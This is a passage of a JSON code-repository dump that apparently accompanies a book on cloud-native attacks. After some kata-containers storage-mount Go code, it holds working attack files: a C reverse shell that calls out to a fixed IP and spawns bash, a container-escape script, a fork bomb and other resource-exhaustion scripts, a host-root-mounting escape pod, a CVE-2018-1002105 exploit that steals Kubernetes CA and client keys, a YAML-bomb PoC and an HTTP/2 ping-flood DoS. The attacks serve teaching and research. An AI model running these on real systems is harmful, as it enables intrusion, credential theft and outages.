int\n\t\toptions []string\n\t)\n\n\tfor _, opt := range optionList {\n\t\tflag, ok := flagList[opt]\n\t\tif ok {\n\t\t\tflags |= flag\n\t\t\tcontinue\n\t\t}\n\n\t\toptions = append(options, opt)\n\t}\n\n\treturn flags, strings.Join(options, \",\")\n}\n\nfunc parseOptions(optionList []string) map[string]string {\n\toptions := make(map[string]string)\n\tfor _, opt := range optionList {\n\t\tidx := strings.Index(opt, \"=\")\n\t\tif idx < 1 {\n\t\t\tcontinue\n\t\t}\n\t\tkey, val := opt[:idx], opt[idx+1:]\n\t\toptions[key] = val\n\t}\n\treturn options\n}\n\nfunc removeMounts(mounts []string) error {\n\tfor _, mount := range mounts {\n\t\tif err := syscall.Unmount(mount, 0); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\treturn nil\n}\n\n// storageHandler is the type of callback to be defined to handle every\n// type of storage driver.\ntype storageHandler func(ctx context.Context, storage pb.Storage, s *sandbox) (string, error)\n\n// storageHandlerList lists the supported drivers.\nvar 
storageHandlerList = map[string]storageHandler{\n\tdriver9pType:        virtio9pStorageHandler,\n\tdriverVirtioFSType:  virtioFSStorageHandler,\n\tdriverBlkType:       virtioBlkStorageHandler,\n\tdriverBlkCCWType:    virtioBlkCCWStorageHandler,\n\tdriverMmioBlkType:   virtioMmioBlkStorageHandler,\n\tdriverSCSIType:      virtioSCSIStorageHandler,\n\tdriverEphemeralType: ephemeralStorageHandler,\n\tdriverLocalType:     localStorageHandler,\n}\n\nfunc ephemeralStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) {\n\ts.Lock()\n\tdefer s.Unlock()\n\tnewStorage := s.setSandboxStorage(storage.MountPoint)\n\n\tif newStorage {\n\t\tvar err error\n\t\tif err = os.MkdirAll(storage.MountPoint, os.ModePerm); err == nil {\n\t\t\t_, err = commonStorageHandler(storage)\n\t\t}\n\t\treturn \"\", err\n\t}\n\treturn \"\", nil\n}\n\nfunc localStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) {\n\ts.Lock()\n\tdefer s.Unlock()\n\tnewStorage := s.setSandboxStorage(storage.MountPoint)\n\tif newStorage {\n\n\t\t// Extract and parse the mode out of the storage options.\n\t\t// Default to os.ModePerm.\n\t\topts := parseOptions(storage.Options)\n\t\tmode := os.ModePerm\n\t\tif val, ok := opts[\"mode\"]; ok {\n\t\t\tm, err := strconv.ParseUint(val, 8, 32)\n\t\t\tif err != nil {\n\t\t\t\treturn \"\", err\n\t\t\t}\n\t\t\tmode = os.FileMode(m)\n\t\t}\n\n\t\tif err := os.MkdirAll(storage.MountPoint, mode); err != nil {\n\t\t\treturn \"\", err\n\t\t}\n\n\t\t// We chmod the permissions for the mount point, as we can't rely on os.MkdirAll to set the\n\t\t// desired permissions.\n\t\treturn \"\", os.Chmod(storage.MountPoint, mode)\n\t}\n\treturn \"\", nil\n}\n\n// virtio9pStorageHandler handles the storage for 9p driver.\nfunc virtio9pStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) {\n\treturn commonStorageHandler(storage)\n}\n\n// virtioMmioBlkStorageHandler handles the storage for mmio blk driver.\nfunc 
virtioMmioBlkStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) {\n\t//The source path is VmPath\n\treturn commonStorageHandler(storage)\n}\n\n// virtioBlkCCWStorageHandler handles the storage for blk ccw driver.\nfunc virtioBlkCCWStorageHandler(ctx context.Context, storage pb.Storage, s *sandbox) (string, error) {\n\tdevPath, err := getBlkCCWDevPath(s, storage.Source)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\tif devPath == \"\" {\n\t\treturn \"\", grpcStatus.Errorf(codes.InvalidArgument,\n\t\t\t\"Storage source is empty\")\n\t}\n\tstorage.Source = devPath\n\treturn commonStorageHandler(storage)\n}\n\n// virtioFSStorageHandler handles the storage for virtio-fs.\nfunc virtioFSStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) {\n\treturn commonStorageHandler(storage)\n}\n\n// virtioBlkStorageHandler handles the storage for blk driver.\nfunc virtioBlkStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) {\n\n\t// If hot-plugged, get the device node path based on the PCI address else\n\t// use the virt path provided in Storage Source\n\tif strings.HasPrefix(storage.Source, \"/dev\") {\n\n\t\tFileInfo, err := os.Stat(storage.Source)\n\t\tif err != nil {\n\t\t\treturn \"\", err\n\t\t}\n\t\t// Make sure the virt path is valid\n\t\tif FileInfo.Mode()&os.ModeDevice == 0 {\n\t\t\treturn \"\", fmt.Errorf(\"invalid device %s\", storage.Source)\n\t\t}\n\n\t} else {\n\t\tdevPath, err := getPCIDeviceName(s, storage.Source)\n\t\tif err != nil {\n\t\t\treturn \"\", err\n\t\t}\n\n\t\tstorage.Source = devPath\n\t}\n\n\treturn commonStorageHandler(storage)\n}\n\n// virtioSCSIStorageHandler handles the storage for scsi driver.\nfunc virtioSCSIStorageHandler(ctx context.Context, storage pb.Storage, s *sandbox) (string, error) {\n\t// Retrieve the device path from SCSI address.\n\tdevPath, err := getSCSIDevPath(s, storage.Source)\n\tif err != nil {\n\t\treturn \"\", 
err\n\t}\n\tstorage.Source = devPath\n\n\treturn commonStorageHandler(storage)\n}\n\nfunc commonStorageHandler(storage pb.Storage) (string, error) {\n\t// Mount the storage device.\n\tif err := mountStorage(storage); err != nil {\n\t\treturn \"\", err\n\t}\n\n\treturn storage.MountPoint, nil\n}\n\n// mountStorage performs the mount described by the storage structure.\nfunc mountStorage(storage pb.Storage) error {\n\tflags, options := parseMountFlagsAndOptions(storage.Options)\n\n\treturn mount(storage.Source, storage.MountPoint, storage.Fstype, flags, options)\n}\n\n// addStorages takes a list of storages passed by the caller and performs the\n// associated operations, such as waiting for the device to show up and mounting\n// it to a specific location, according to the type of handler chosen for\n// each storage.\nfunc addStorages(ctx context.Context, storages []*pb.Storage, s *sandbox) (mounts []string, err error) {\n\tspan, ctx := trace(ctx, \"mount\", \"addStorages\")\n\tspan.setTag(\"sandbox\", s.id)\n\tdefer span.finish()\n\n\tvar mountList []string\n\tvar storageList []string\n\n\tdefer func() {\n\t\tif err != nil {\n\t\t\ts.Lock()\n\t\t\tfor _, path := range storageList {\n\t\t\t\tif err := s.unsetAndRemoveSandboxStorage(path); err != nil {\n\t\t\t\t\tagentLog.WithFields(logrus.Fields{\n\t\t\t\t\t\t\"error\": err,\n\t\t\t\t\t\t\"path\":  path,\n\t\t\t\t\t}).Error(\"failed to roll back addStorages\")\n\t\t\t\t}\n\t\t\t}\n\t\t\ts.Unlock()\n\t\t}\n\t}()\n\n\tfor _, storage := range storages {\n\t\tif storage == nil {\n\t\t\tcontinue\n\t\t}\n\n\t\tdevHandler, ok := storageHandlerList[storage.Driver]\n\t\tif !ok {\n\t\t\treturn nil, grpcStatus.Errorf(codes.InvalidArgument,\n\t\t\t\t\"Unknown storage driver %q\", storage.Driver)\n\t\t}\n\n\t\t// Wrap the span around the handler call to avoid modifying\n\t\t// the handler interface but also to avoid having to add trace\n\t\t// code to each driver.\n\t\thandlerSpan, _ := trace(ctx, \"mount\", 
storage.Driver)\n\t\tmountPoint, err := devHandler(ctx, *storage, s)\n\t\thandlerSpan.finish()\n\n\t\tif _, ok := s.storages[storage.MountPoint]; ok {\n\t\t\tstorageList = append([]string{storage.MountPoint}, storageList...)\n\t\t}\n\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\tif mountPoint != \"\" {\n\t\t\t// Prepend mount point to mount list.\n\t\t\tmountList = append([]string{mountPoint}, mountList...)\n\t\t}\n\t}\n\n\treturn mountList, nil\n}\n\n// getMountFSType returns the FS type corresponding to the passed mount point and\n// any error encountered.\nfunc getMountFSType(mountPoint string) (string, error) {\n\tif mountPoint == \"\" {\n\t\treturn \"\", errors.Errorf(\"Invalid mount point '%s'\", mountPoint)\n\t}\n\n\tmountstats, err := os.Open(procMountStats)\n\tif err != nil {\n\t\treturn \"\", errors.Wrapf(err, \"Failed to open file '%s'\", procMountStats)\n\t}\n\tdefer mountstats.Close()\n\n\t// Refer to fs/proc_namespace.c:show_vfsstat() for\n\t// the file format.\n\tre := regexp.MustCompile(fmt.Sprintf(`device .+ mounted on %s with fstype (.+)`, mountPoint))\n\n\tscanner := bufio.NewScanner(mountstats)\n\tfor scanner.Scan() {\n\t\tline := scanner.Text()\n\t\tmatches := re.FindStringSubmatch(line)\n\t\tif len(matches) > 1 {\n\t\t\treturn matches[1], nil\n\t\t}\n\t}\n\n\tif err := scanner.Err(); err != nil {\n\t\treturn \"\", errors.Wrapf(err, \"Failed to parse proc mount stats file %s\", procMountStats)\n\t}\n\n\treturn \"\", errors.Errorf(\"Failed to find FS type for mount point '%s'\", mountPoint)\n}\n"
  },
  {
    "path": "code/0304-运行时攻击/02-安全容器逃逸/evil_bin.c",
    "content": "/* credits to http://blog.techorganic.com/2015/01/04/pegasus-hacking-challenge/ */\n#include <stdio.h>\n#include <unistd.h>\n#include <netinet/in.h>\n#include <arpa/inet.h> /* inet_addr() */\n#include <sys/types.h>\n#include <sys/socket.h>\n#define REMOTE_ADDR \"172.16.56.1\"\n#define REMOTE_PORT 10000\nint main(int argc, char *argv[])\n{\n    struct sockaddr_in sa;\n    int s;\n    sa.sin_family = AF_INET;\n    sa.sin_addr.s_addr = inet_addr(REMOTE_ADDR);\n    sa.sin_port = htons(REMOTE_PORT);\n    s = socket(AF_INET, SOCK_STREAM, 0);\n    connect(s, (struct sockaddr *)&sa, sizeof(sa));\n    dup2(s, 0);\n    dup2(s, 1);\n    dup2(s, 2);\n    execve(\"/bin/bash\", 0, 0);\n    return 0;\n}\n"
  },
  {
    "path": "code/0304-运行时攻击/02-安全容器逃逸/exploit.sh",
    "content": "#!/bin/bash\n\nset -e\n\n# warm up\necho \"[*] Running an Ubuntu container to warm up...\"\ndocker run --rm ubuntu uname -a\n\necho \"[*] Exploiting to escape kata...\"\n\necho \"[*] Running malicious container with kata on CLH...\"\ndocker run --rm --name stage1 kata-malware-image:latest\n\necho \"[+] Guest image file has been compromised\"\n\necho \"[*] Running malicious container with kata on CLH once again...\"\ndocker run --rm -d --name stage2 kata-malware-image:latest\n\necho \"[+] Done. Now you can wait for the reverse shell :)\"\n"
  },
  {
    "path": "code/0304-运行时攻击/02-安全容器逃逸/get_kata_src.sh",
    "content": "#!/bin/bash\n\nmkdir -p $GOPATH/src/github.com/kata-containers/\ncd $GOPATH/src/github.com/kata-containers/\ngit clone https://github.com/kata-containers/agent\ncd agent\ngit checkout 1.10.0"
  },
  {
    "path": "code/0304-运行时攻击/02-安全容器逃逸/install_kata.sh",
    "content": "#!/bin/bash\nset -e -x\n\n# Download the release tarball (skip this step if it has already been downloaded)\n#wget https://github.com/kata-containers/runtime/releases/download/1.10.0/kata-static-1.10.0-x86_64.tar.xz\ntar xf kata-static-1.10.0-x86_64.tar.xz\nrm -rf /opt/kata\nmv ./opt/kata /opt\nrmdir ./opt\nrm -rf /etc/kata-containers\ncp -r /opt/kata/share/defaults/kata-containers /etc/\n# Use Cloud Hypervisor as the hypervisor\nrm /etc/kata-containers/configuration.toml\nln -s /etc/kata-containers/configuration-clh.toml /etc/kata-containers/configuration.toml\n# Configure Docker\nmkdir -p /etc/docker/\ncat << EOF > /etc/docker/daemon.json\n{\n  \"runtimes\": {\n    \"kata-runtime\": {\n      \"path\": \"/opt/kata/bin/kata-runtime\"\n    },\n    \"kata-clh\": {\n      \"path\": \"/opt/kata/bin/kata-clh\"\n    },\n    \"kata-qemu\": {\n      \"path\": \"/opt/kata/bin/kata-qemu\"\n    }\n  },\n  \"registry-mirrors\": [\"https://docker.mirrors.ustc.edu.cn/\"]\n}\nEOF\nmkdir -p /etc/systemd/system/docker.service.d/\ncat << EOF > /etc/systemd/system/docker.service.d/kata-containers.conf\n[Service]\nExecStart=\nExecStart=/usr/bin/dockerd -D --add-runtime kata-runtime=/opt/kata/bin/kata-runtime --add-runtime kata-clh=/opt/kata/bin/kata-clh --add-runtime kata-qemu=/opt/kata/bin/kata-qemu --default-runtime=kata-runtime\nEOF\n# Reload configuration & restart Docker\nsystemctl daemon-reload && systemctl restart docker"
  },
  {
    "path": "code/0304-运行时攻击/03-资源耗尽型攻击/exhaust_cpu.sh",
    "content": "#!/bin/bash\n\n# for Debian & Ubuntu\n# apt install -y stress\n\nstress -c 1000"
  },
  {
    "path": "code/0304-运行时攻击/03-资源耗尽型攻击/exhaust_disk.sh",
    "content": "#!/bin/bash\n\n# for Debian & Ubuntu\n# apt install -y util-linux\n\nfallocate -l 9.4G ./bomb"
  },
  {
    "path": "code/0304-运行时攻击/03-资源耗尽型攻击/exhaust_mem.sh",
    "content": "#!/bin/bash\n\n# for Debian & Ubuntu\n# apt install -y stress\n\nstress --vm-bytes 3300m --vm-keep -m 3"
  },
  {
    "path": "code/0304-运行时攻击/03-资源耗尽型攻击/exhaust_pid.sh",
    "content": "#!/bin/bash\n\n# fork bomb: the function ':' pipes into itself and runs in the background,\n# recursively exhausting the available PIDs\n:() { :|:& };:"
  },
  {
    "path": "code/0402-Kubernetes组件不安全配置/deploy_escape_pod_on_remote_host.sh",
    "content": "#!/bin/bash\n\ncat << EOF > escape.yaml\n# escape.yaml\napiVersion: v1\nkind: Pod\nmetadata:\n  name: attacker\nspec:\n  containers:\n  - name: ubuntu\n    image: ubuntu:latest\n    imagePullPolicy: IfNotPresent\n    # Just spin & wait forever\n    command: [ \"/bin/bash\", \"-c\", \"--\" ]\n    args: [ \"while true; do sleep 30; done;\" ]\n    volumeMounts:\n    - name: escape-host\n      mountPath: /host-escape-door\n  volumes:\n    - name: escape-host\n      hostPath:\n        path: /\nEOF\n\nkubectl -s TARGET-IP:8080 apply -f escape.yaml\nsleep 8\nkubectl -s TARGET-IP:8080 exec -it attacker -- /bin/bash"
  },
  {
    "path": "code/0403-CVE-2018-1002105/attacker.yaml",
    "content": "# attacker.yaml\napiVersion: v1\nkind: Pod\nmetadata:\n  name: attacker\nspec:\n  containers:\n  - name: ubuntu\n    image: ubuntu:latest\n    imagePullPolicy: IfNotPresent\n    # Just spin & wait forever\n    command: [ \"/bin/bash\", \"-c\", \"--\" ]\n    args: [ \"while true; do sleep 30; done;\" ]\n    volumeMounts:\n    - name: escape-host\n      mountPath: /host-escape-door\n  volumes:\n    - name: escape-host\n      hostPath:\n        path: /\n"
  },
  {
    "path": "code/0403-CVE-2018-1002105/cve_2018_1002105_namespace.yaml",
    "content": "# cve_2018_1002105_namespace.yaml\napiVersion: v1\nkind: Namespace\nmetadata:\n  name: test\n"
  },
  {
    "path": "code/0403-CVE-2018-1002105/cve_2018_1002105_pod.yaml",
    "content": "# cve_2018_1002105_pod.yaml\napiVersion: v1\nkind: Pod\nmetadata:\n  name: test\n  namespace: test\nspec:\n  containers:\n  - name: ubuntu\n    image: ubuntu:latest\n    imagePullPolicy: IfNotPresent\n    # Just spin & wait forever\n    command: [ \"/bin/bash\", \"-c\", \"--\" ]\n    args: [ \"while true; do sleep 30; done;\" ]\n  serviceAccount: default\n  serviceAccountName: default\n"
  },
  {
    "path": "code/0403-CVE-2018-1002105/cve_2018_1002105_role.yaml",
    "content": "# cve_2018_1002105_role.yaml\napiVersion: rbac.authorization.k8s.io/v1\nkind: Role\nmetadata:\n  name: test\n  namespace: test\nrules:\n- apiGroups:\n  - \"\"\n  resources:\n  - pods\n  verbs:\n  - get\n  - list\n  - delete\n  - watch\n- apiGroups:\n  - \"\"\n  resources:\n  - pods/exec\n  verbs:\n  - create\n  - get\n"
  },
  {
    "path": "code/0403-CVE-2018-1002105/cve_2018_1002105_role_binding.yaml",
    "content": "# cve_2018_1002105_role_binding.yaml\napiVersion: rbac.authorization.k8s.io/v1\nkind: RoleBinding\nmetadata:\n  name: test\n  namespace: test\nroleRef:\n  apiGroup: rbac.authorization.k8s.io\n  kind: Role\n  name: test\nsubjects:\n- apiGroup: rbac.authorization.k8s.io\n  kind: Group\n  name: test\n"
  },
  {
    "path": "code/0403-CVE-2018-1002105/exploit.py",
    "content": "\"\"\"ExP for CVE-2018-1002105\nONLY USED FOR SECURITY RESEARCH\nILLEGAL USE IS **PROHIBITED**\n\"\"\"\n\nimport base64\nimport sys\nimport argparse\nimport socket\nimport ssl\nfrom secrets import token_bytes\nfrom urllib import parse\nimport json\n\ntry:\n    from http_parser.parser import HttpParser\nexcept ImportError:\n    from http_parser.pyparser import HttpParser\n\ncontext = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)\n\n# Args\nparser = argparse.ArgumentParser(description='ExP for CVE-2018-1002105.')\nrequired = parser.add_argument_group('required arguments')\nrequired.add_argument('--target', '-t', dest='host', type=str,\n                      help='API Server\\'s IP', required=True)\nrequired.add_argument('--port', '-p', dest='port', type=str,\n                      help='API Server\\'s port', required=True)\nrequired.add_argument('--bearer-token', '-b', dest='token', type=str,\n                      help='Bearer token for the low privileged user', required=True)\nrequired.add_argument('--namespace', '-n', dest='namespace', type=str,\n                      help='Namespace with method access',\n                      default='default', required=True)\nrequired.add_argument('--pod', '-P', dest='pod', type=str,\n                      required=True, help='Pod with method access')\nargs = parser.parse_args()\n\n# HTTP Gadgets\nhttp_delimiter = '\\r\\n'\nhost_header = f'Host: {args.host}:{args.port}'\nauth_header = f'Authorization: Bearer {args.token}'\nconn_header = 'Connection: upgrade'\nupgrade_header = 'Upgrade: websocket'\nagent_header = 'User-Agent: curl/7.64.1'\naccept_header = 'Accept: */*'\norigin_header = f'Origin: http://{args.host}:{args.port}'\nsec_key = base64.b64encode(token_bytes(20)).decode('utf-8')\nsec_websocket_key = f'Sec-WebSocket-Key: {sec_key}'\nsec_websocket_version = 'Sec-WebSocket-Version: 13'\n\n# secret targets\nca_crt = 'ca.crt'\nclient_crt = 'apiserver-kubelet-client.crt'\nclient_key = 
'apiserver-kubelet-client.key'\n\n\ndef _get_http_body(byte_http):\n    p = HttpParser()\n    recved = len(byte_http)\n    p.execute(byte_http, recved)\n    return p.recv_body().decode('utf-8')\n\n\ndef _recv_all_once(ssock, length=4096):\n    res = b\"\"\n    while True:\n        try:\n            chunk = ssock.recv(length)\n        except socket.timeout:\n            # keep waiting until at least some data has arrived\n            if not res:\n                continue\n            break\n        if not chunk:\n            # peer closed the connection; stop reading\n            break\n        res += chunk\n    return res\n\n\ndef _try_to_get_privilege(ssock, namespace, pod):\n    payload1 = http_delimiter.join(\n        (f'GET /api/v1/namespaces/{namespace}/pods/{pod}/exec HTTP/1.1',\n         host_header,\n         auth_header,\n         upgrade_header,\n         conn_header))\n    payload1 += http_delimiter * 2\n    ssock.send(payload1.encode('utf-8'))\n\n\ndef _run_with_privilege(ssock, get_path):\n    payload = http_delimiter.join(\n        (f'GET {get_path} HTTP/1.1',\n         host_header,\n         auth_header,\n         conn_header,\n         upgrade_header,\n         origin_header,\n         sec_websocket_key,\n         sec_websocket_version))\n    payload += http_delimiter * 2\n    ssock.send(payload.encode('utf-8'))\n\n\ndef _match_or_exit(banner_bytes, resp, fail_message=\"[-] Failed.\"):\n    if banner_bytes in resp:\n        return\n    print(fail_message)\n    sys.exit(1)\n\n\ndef _get_secret(resp):\n    delimiter = b'-----'\n    start = resp.index(delimiter)\n    end = resp.rindex(delimiter)\n    return resp[start:end + len(delimiter)].decode('utf-8')\n\n\ndef _save_file(file_name, content):\n    with open(file_name, 'w') as f:\n        f.write(content)\n\n\ndef _steal_secret(api_server, secret_file, match_banner):\n    with socket.create_connection((args.host, int(args.port))) as sock:\n        with context.wrap_socket(sock, server_hostname=args.host) as ssock:\n            ssock.settimeout(1)\n            print('[*] Creating new privileged pipe...')\n            
_try_to_get_privilege(ssock, namespace=args.namespace, pod=args.pod)\n            resp = _recv_all_once(ssock)\n            _match_or_exit(b'stdin, stdout, stderr', resp)\n            print(f\"[*] Trying to steal {secret_file}...\")\n            cmd1 = parse.quote('/bin/cat')\n            cmd2 = parse.quote(f\"/etc/kubernetes/pki/{secret_file}\")\n            _run_with_privilege(\n                ssock,\n                f'/exec/kube-system/{api_server}/kube-apiserver?command={cmd1}&command={cmd2}&input=1&output=1&tty=0')\n            resp = _recv_all_once(ssock)\n            _match_or_exit(b'HTTP/1.1 101 Switching Protocols', resp)\n            _match_or_exit(match_banner, resp, fail_message=f'[-] Cannot find banner {match_banner}.')\n            print(f'[+] Got {secret_file}.')\n            secret_content = _get_secret(resp)\n            _save_file(secret_file, secret_content)\n            print(f'[+] Secret {secret_file} saved :)')\n\n\ndef main():\n    print(\"[*] Exploiting CVE-2018-1002105...\")\n    with socket.create_connection((args.host, int(args.port))) as sock:\n        with context.wrap_socket(sock, server_hostname=args.host) as ssock:\n            # step 1\n            ssock.settimeout(1)\n            print(\"[*] Checking vulnerable or not...\")\n            _try_to_get_privilege(ssock, namespace=args.namespace, pod=args.pod)\n            resp = _recv_all_once(ssock)\n            _match_or_exit(\n                b'stdin, stdout, stderr',\n                resp,\n                fail_message='[-] Not vulnerable to CVE-2018-1002105.')\n            print(\"[+] Vulnerable to CVE-2018-1002105, continue.\")\n\n            # step 2\n            print(\"[*] Getting running pods list...\")\n            _run_with_privilege(ssock, '/runningpods/')\n            resp = _recv_all_once(ssock)\n            _match_or_exit(b'HTTP/1.1 200 OK', resp)\n            print(\"[+] Got running pods list.\")\n\n            pods_info = json.loads(_get_http_body(resp))\n            
pods_list = [pod['metadata']['name'] for pod in pods_info['items']]\n            for pod in pods_list:\n                if pod.startswith('kube-apiserver'):\n                    api_server = pod\n                    break\n            else:\n                print(\"[-] Cannot find API Server.\")\n                sys.exit(1)\n            print(f\"[*] API Server is {api_server}.\")\n\n            # step 3\n            _steal_secret(\n                api_server=api_server,\n                secret_file=ca_crt,\n                match_banner=b'BEGIN CERTIFICATE')\n            _steal_secret(\n                api_server=api_server,\n                secret_file=client_crt,\n                match_banner=b'BEGIN CERTIFICATE')\n            _steal_secret(\n                api_server=api_server,\n                secret_file=client_key,\n                match_banner=b'BEGIN RSA PRIVATE KEY')\n\n    print('[+] Enjoy your trip :)')\n    cmd_try = f\"kubectl --server=https://{args.host}:{args.port}\" \\\n              f\" --certificate-authority={ca_crt}\" \\\n              f\" --client-certificate={client_crt}\" \\\n              f\" --client-key={client_key} get pods -n kube-system\"\n    print(cmd_try)\n\n\nif __name__ == \"__main__\":\n    main()\n"
  },
  {
    "path": "code/0403-CVE-2018-1002105/test-token.csv",
    "content": "password,test,test,test\n"
  },
  {
    "path": "code/0404-K8s拒绝服务攻击/CVE-2019-11253-poc.sh",
    "content": "#!/bin/bash\n\n# Check the Kubernetes version\nkubectl version | grep Server\n# Start a proxy to the API Server\nkubectl proxy &\n# Create a malicious ConfigMap manifest (n=9)\ncat << EOF > cve-2019-11253.yaml\napiVersion: v1\ndata:\n  a: &a [\"web\",\"web\",\"web\",\"web\",\"web\",\"web\",\"web\",\"web\",\"web\"]\n  b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]\n  c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]\n  d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]\n  e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]\n  f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]\n  g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]\n  h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]\n  i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]\nkind: ConfigMap\nmetadata:\n  name: yaml-bomb\n  namespace: default\nEOF\n# Send the ConfigMap creation request to the API Server\ncurl -X POST http://127.0.0.1:8001/api/v1/namespaces/default/configmaps -H \"Content-Type: application/yaml\" --data-binary @cve-2019-11253.yaml"
  },
  {
    "path": "code/0404-K8s拒绝服务攻击/CVE-2019-9512-poc.py",
    "content": "#!/usr/bin/python\n# cve-2019-9512.py\n\nimport ssl\nimport socket\nimport time\nimport sys\n\n\nclass PingFlood:\n    # HTTP/2 connection preface (magic)\n    PREAMBLE = b'PRI * HTTP/2.0\\r\\n\\r\\nSM\\r\\n\\r\\n'\n    # PING frame\n    PING_FRAME = b\"\\x00\\x00\\x08\" \\\n        b\"\\x06\" \\\n        b\"\\x00\" \\\n        b\"\\x00\\x00\\x00\\x00\" \\\n        b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\"\n    # WINDOW_UPDATE frame\n    WINDOW_UPDATE_FRAME = b\"\\x00\\x00\\x04\\x08\\x00\\x00\\x00\\x00\\x00\\x3f\\xff\\x00\\x01\"\n    # SETTINGS frame\n    SETTINGS_FRAME = b\"\\x00\\x00\\x12\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x64\\x00\" \\\n        b\"\\x04\\x40\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\"\n    # SETTINGS ACK frame\n    SETTINGS_ACK_FRAME = b\"\\x00\\x00\\x00\\x04\\x01\\x00\\x00\\x00\\x00\"\n    # HEADERS frame requesting /healthz\n    HEADERS_FRAME_healthz = b\"\\x00\\x00\\x29\\x01\\x05\\x00\\x00\\x00\\x01\\x82\\x04\\x86\\x62\\x72\\x8e\\x84\" \\\n        b\"\\xcf\\xef\\x87\\x41\\x8e\\x0b\\xe2\\x5c\\x2e\\x3c\\xb8\\x5f\\x5c\\x4d\\x8a\\xe3\" \\\n        b\"\\x8d\\x34\\xcf\\x7a\\x88\\x25\\xb6\\x50\\xc3\\xab\\xb8\\xd2\\xe1\\x53\\x03\\x2a\" \\\n        b\"\\x2f\\x2a\"\n\n    def __init__(self, ip, port=6443, socket_count=1000):\n        # Configure the TLS context for connecting to the Kubernetes API Server\n        self._context = ssl.SSLContext(ssl.PROTOCOL_TLS)\n        self._context.check_hostname = False\n        self._context.load_cert_chain(certfile=\"./client_cert\", keyfile=\"./client_key_data\")\n        self._context.load_verify_locations(\"./certificate_authority_data\")\n        self._context.verify_mode = ssl.CERT_REQUIRED\n        # self._context.keylog_filename = \"/Users/rambo/Desktop/exp/keylog\"\n        # ALPN protocol negotiation\n        self._context.set_alpn_protocols(['h2', 'http/1.1'])\n\n        self._ip = ip\n        self._port = port\n        # Create socket_count sockets\n        self._sockets = [self.create_socket() for _ in range(socket_count)]\n\n    def create_socket(self):\n        try:\n            
print(\"[*] Creating socket...\")\n            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n            sock.settimeout(4)\n            # Apply the configured TLS context\n            ssock = self._context.wrap_socket(sock, server_side=False)\n            ssock.connect((self._ip, self._port))\n            # First issue a normal request to the /healthz endpoint\n            ssock.send(self.PREAMBLE)\n            ssock.send(self.SETTINGS_FRAME)\n            ssock.send(self.HEADERS_FRAME_healthz)\n            ssock.send(self.SETTINGS_ACK_FRAME)\n            # Receive the responses\n            rmsg = ssock.recv(1024)\n            rmsg = ssock.recv(1024)\n            rmsg = ssock.recv(1024)\n            rmsg = ssock.recv(1024)\n            rmsg = ssock.recv(4096)\n            # Return a socket ready to be used for the attack\n            return ssock\n        except socket.error as se:\n            print(\"[-] Error: \" + str(se))\n            # Socket creation failed; wait a moment and try again\n            time.sleep(0.5)\n            return self.create_socket()\n\n    def attack(self):\n        print(\"[*] Flooding...\")\n        # iterate over a copy, since the list is mutated inside the loop\n        for s in list(self._sockets):\n            try:\n                # Send a PING frame without reading the response\n                s.send(self.PING_FRAME)\n            except socket.error:\n                self._sockets.remove(s)\n                self._sockets.append(self.create_socket())\n\n\nif __name__ == \"__main__\":\n    dos = PingFlood(sys.argv[1], int(sys.argv[2]), int(sys.argv[3]))\n    dos.attack()"
  },
  {
    "path": "code/0405-云原生网络攻击/Dockerfile",
    "content": "FROM ubuntu:latest\n\nCOPY k8s_dns_mitm.py /poc.py\n\nRUN sed -i 's/archive.ubuntu.com/mirrors.ustc.edu.cn/g' /etc/apt/sources.list\nRUN apt update && DEBIAN_FRONTEND=noninteractive apt install -y python3 python3-pip && apt clean\n\nRUN pip3 install scapy -i https://pypi.tuna.tsinghua.edu.cn/simple --trusted-host pypi.tuna.tsinghua.edu.cn\n\nRUN chmod u+x /poc.py\n\nENTRYPOINT [\"/bin/bash\", \"-c\", \"/poc.py example.com \"]"
  },
  {
    "path": "code/0405-云原生网络攻击/attacker.yaml",
    "content": "# attacker_pod\napiVersion: v1\nkind: Pod\nmetadata:\n  name: attacker\nspec:\n  containers:\n  - name: main\n    image: k8s_dns_mitm:1.0\n    imagePullPolicy: IfNotPresent"
  },
  {
    "path": "code/0405-云原生网络攻击/build_image.sh",
    "content": "#!/bin/bash\n\ndocker build -t k8s_dns_mitm:1.0 ."
  },
  {
    "path": "code/0405-云原生网络攻击/cleanup.sh",
    "content": "#!/bin/bash\n\nset -e -x\n\nkubectl delete pod victim attacker\n\nfor record in $(arp  | grep cni0 | awk '{print $1}'); do\n  arp -d \"$record\"\ndone\n"
  },
  {
    "path": "code/0405-云原生网络攻击/exploit.sh",
    "content": "#!/bin/bash\n\nset -e\n\necho \"[*] Pulling curl image...\"\ndocker pull curlimages/curl:latest\n\necho \"[*] Creating attacker and victim pods...\"\nkubectl apply -f attacker.yaml\nkubectl apply -f victim.yaml\n\necho \"[*] Waiting 20s for pods' creation...\"\nsleep 20\n\necho \"[*] Reading attacker's log...\"\nkubectl logs attacker\n\necho \"[*] Trying to curl http://example.com in victim...\"\nkubectl exec -it victim curl http://example.com"
  },
  {
    "path": "code/0405-云原生网络攻击/k8s_dns_mitm.py",
